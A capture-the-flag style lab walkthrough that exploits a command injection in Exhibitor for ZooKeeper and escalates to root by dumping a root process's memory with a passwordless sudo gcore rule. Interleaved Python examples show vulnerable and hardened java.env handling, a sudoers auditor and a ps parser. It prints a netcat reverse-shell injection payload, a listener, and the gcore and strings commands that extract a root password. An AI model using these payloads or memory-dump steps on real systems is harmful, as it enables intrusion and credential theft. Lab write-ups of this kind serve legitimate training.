About This Lab: To exploit this lab, you’ll achieve an initial foothold through an unauthenticated command injection vulnerability. Following that, you’ll gain root access by leveraging sudo to disclose a password. This lab enhances your skills in identifying and exploiting command injection vulnerabilities and understanding privilege escalation techniques.
Recon
Start enumeration with rustscan and automatically pass the open ports to nmap to run script, version, and OS scans against them.
rustscan -a 192.168.116.98 --ulimit 5000 -- -A


SMB is open on 139/445, so we can check whether there are any shares we have anonymous access to with smbmap.
smbmap -H 192.168.116.98

No luck.
In our nmap scan we have an HTTP port 8081 that mentions a redirect to http://192.168.116.98:8080/exhibitor/v1/ui/index.html. If we follow that URL we land on this page.

Doing a quick Google search for Exhibitor for ZooKeeper just to see what it is, we are presented with an RCE vulnerability. That is good to see.


The application is on the vulnerable version, so we should get command injection as long as the payload is surrounded by a ' or a $ symbol. The command must be entered in the java.env script field. We can get a reverse shell with a simple nc one-liner.
$(/bin/nc -e /bin/sh 192.168.45.249 4444 &)
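The injection works because the java.env value ends up in a file that a shell later sources, so anything wrapped in $( ) or a stray quote is interpreted rather than treated as data. The following added example (not Exhibitor's code, and the JVMFLAGS variable name and allowlist are assumptions for illustration) shows the vulnerable write pattern next to a hardened one that allowlists JVM option characters and quotes the result with shlex.quote:

```python
import re
import shlex

# Constructed allowlist for JVM option strings (e.g. -Xmx512m, -Dfoo=bar).
# This is an assumption about what a hardened endpoint should accept,
# not Exhibitor's own validation logic.
ALLOWED_JVM_FLAG = re.compile(r"^[A-Za-z0-9_.:=/,+%-]+$")

# Shell constructs that turn a value sourced by a shell into command execution.
UNSAFE_CONSTRUCTS = {
    "command substitution $()": re.compile(r"\$\("),
    "backtick substitution": re.compile(r"`"),
    "command separator or pipe": re.compile(r"[;&|]"),
    "quote character": re.compile(r"['\"]"),
    "newline (adds a line to the script)": re.compile(r"[\r\n]"),
    "variable expansion": re.compile(r"\$\{?[A-Za-z_]"),
}


def find_unsafe_constructs(value: str) -> list:
    """Names of the shell constructs present in a java.env-style value, in dict order."""
    return [name for name, pat in UNSAFE_CONSTRUCTS.items() if pat.search(value)]


def render_java_env_vulnerable(flags: str) -> str:
    """Vulnerable pattern (constructed): the value is interpolated unquoted into a
    file that a shell sources later, so $(...) and friends execute at source time."""
    return f"export JVMFLAGS={flags}\n"


def render_java_env_hardened(flags: str) -> str:
    """Hardened version: every flag must match the allowlist, and the whole value
    is quoted with shlex.quote so the shell treats it purely as data."""
    for flag in flags.split():
        if not ALLOWED_JVM_FLAG.match(flag):
            why = find_unsafe_constructs(flag) or ["character outside allowlist"]
            raise ValueError(f"rejected JVM flag {flag!r}: {', '.join(why)}")
    return f"export JVMFLAGS={shlex.quote(flags)}\n"


if __name__ == "__main__":
    # Constructed samples: one legitimate value, two values carrying shell syntax.
    for sample in ["-Xmx512m -Dfoo=bar", "$(id)", "'; id; '"]:
        print("vulnerable:", render_java_env_vulnerable(sample).rstrip())
        try:
            print("hardened  :", render_java_env_hardened(sample).rstrip())
        except ValueError as err:
            print("hardened  : REJECTED ->", err)
```

The allowlist is deliberately stricter than what shlex.quote alone would need; quoting stops the shell from expanding the value, while the allowlist makes the rejection explicit and loggable so a defender sees injection attempts in the application log instead of only in the resulting shell.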

We set up a revshell and wait.
nc -nvlp 4444

We’re in as user Charles!
We need to improve our tty before proceeding.
python3 -c 'import pty;pty.spawn("/bin/bash")'
The first thing I like to do with initial access is check for sudo privileges.
sudo -l

We can run /usr/bin/gcore with no password. We can check GTFOBins to see if there are any sudo privilege abuses for gcore.
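The root cause on the defensive side is a sudoers rule that hands a memory-dumping tool to an unprivileged user without a password. The following added example (not part of the writeup, and the hostname, Defaults line and second rule in the sample are constructed; only the gcore rule mirrors the lab) parses `sudo -l` style output and flags rules an administrator should remove:

```python
import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output. The gcore rule matches the writeup;
# the hostname, Defaults line and systemctl rule are made up for illustration.
SAMPLE_SUDO_L = """\
Matching Defaults entries for charles on exhibitor:
    env_reset, mail_badpass

User charles may run the following commands on exhibitor:
    (ALL) NOPASSWD: /usr/bin/gcore
    (root) /usr/bin/systemctl status exhibitor
"""

# One rule line: "(runas) [TAG: ...] command". Tags such as NOPASSWD: end in a colon.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries that read another process's memory when run as root. Assumption for this
# example: gcore (from the writeup) and gdb, which gcore is a front-end for.
MEMORY_READERS = {"gcore", "gdb"}


@dataclass
class SudoRule:
    runas: str
    tags: tuple
    command: str


def parse_sudo_l(text: str) -> list:
    """Extract the command rules that follow the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = tuple(t.rstrip(":") for t in m.group("tags").split())
            rules.append(SudoRule(m.group("runas"), tags, m.group("cmd")))
    return rules


def audit_rules(rules: list) -> list:
    """Return (rule, reason) pairs for rules that expose root or root's memory."""
    findings = []
    for rule in rules:
        binary = rule.command.split()[0].rsplit("/", 1)[-1]
        if rule.command == "ALL":
            findings.append((rule, "unrestricted ALL: equivalent to root"))
        elif binary in MEMORY_READERS:
            reason = f"{binary} can dump any process's memory, exposing secrets held in RAM"
            if "NOPASSWD" in rule.tags:
                reason += "; no password required"
            findings.append((rule, reason))
    return findings


if __name__ == "__main__":
    for rule, reason in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({rule.runas}) {rule.command}: {reason}")
```

Run the same audit against `sudo -l -U <user>` output on real hosts; the fix the finding points at is removing the gcore rule (or restricting it to specific PIDs is not possible, so removal is the practical option) and keeping credentials out of long-lived process memory where feasible.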

If we are able to do privileged reads on files by specifying the process ID, we first need to list all the running processes. Any process running a file as root or another user would be what we want to target.
ps auxww
# The extra ww means "don't truncate the output": it tells ps to show the entire command line for each process, regardless of length.
ww stands for "wide wide", an old UNIX convention (each w widens the output further).
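Because `ps auxww` keeps the full command line, its output can be parsed reliably: the first ten columns never contain spaces, so only the COMMAND column needs the remainder of the line. The following added example (not part of the writeup; every row except the PID 494 password-store line is constructed) parses that format and, as a defender's inventory, lists which root processes are exposed to a memory dump and looks up a PID by executable name:

```python
# Constructed sample of `ps auxww` output. Only the password-store row (PID 494)
# reflects the writeup; the other rows and the long java command line are made up.
SAMPLE_PS = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 169388 11200 ?        Ss   10:01   0:02 /sbin/init
root         494  0.0  0.0   2364   580 ?        Ss   10:01   0:00 /usr/bin/password-store
charles      812  1.5  9.8 3104560 402112 ?      Ssl  10:02   0:41 java -Xmx512m -jar /opt/exhibitor/exhibitor.jar --configtype file --fsconfigdir /opt/exhibitor/conf
charles     1033  0.0  0.1   9044  3312 pts/0    R+   10:15   0:00 ps auxww
"""

# Column order of `ps aux`; COMMAND is last and may contain spaces.
FIELDS = ("user", "pid", "cpu", "mem", "vsz", "rss", "tty", "stat", "start", "time", "command")


def parse_ps_aux(text: str) -> list:
    """Turn `ps aux[ww]` output into a list of dicts keyed by FIELDS."""
    records = []
    for line in text.splitlines()[1:]:           # skip the header row
        parts = line.split(None, len(FIELDS) - 1)  # split only the first 10 gaps
        if len(parts) != len(FIELDS):
            continue                             # blank or malformed line
        rec = dict(zip(FIELDS, parts))
        rec["pid"] = int(rec["pid"])
        records.append(rec)
    return records


def executable_name(record: dict) -> str:
    """Basename of the first word of the command line (the program that was run)."""
    return record["command"].split()[0].rsplit("/", 1)[-1]


def processes_for_user(records: list, user: str) -> list:
    """All processes owned by `user`; for root these are the ones a sudo gcore rule exposes."""
    return [r for r in records if r["user"] == user]


def pids_for_executable(records: list, name: str) -> list:
    """PIDs whose executable basename equals `name`, e.g. 'password-store'."""
    return [r["pid"] for r in records if executable_name(r) == name]


if __name__ == "__main__":
    procs = parse_ps_aux(SAMPLE_PS)
    print("root-owned processes (exposed to a privileged memory dump):")
    for r in processes_for_user(procs, "root"):
        print(f"  PID {r['pid']:>5}  {r['command']}")
    print("password-store PIDs:", pids_for_executable(procs, "password-store"))
```

Feeding real `ps auxww` output into `parse_ps_aux` (for example via `subprocess.run(["ps", "auxww"], capture_output=True, text=True).stdout`) gives a quick baseline of which long-running root services exist on a host, which is the list worth reviewing for secrets that live in memory.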

The file /usr/bin/password-store looks interesting.
We can use gcore on this process. It is running as PID 494. Then we can extract readable data from the dump with strings.
sudo /usr/bin/gcore 494
strings core.494


We have some creds!
We can try to use these creds to SSH into the box, or we can switch user.
su - root

The root flag can be found in the current working directory.

Pwn3d!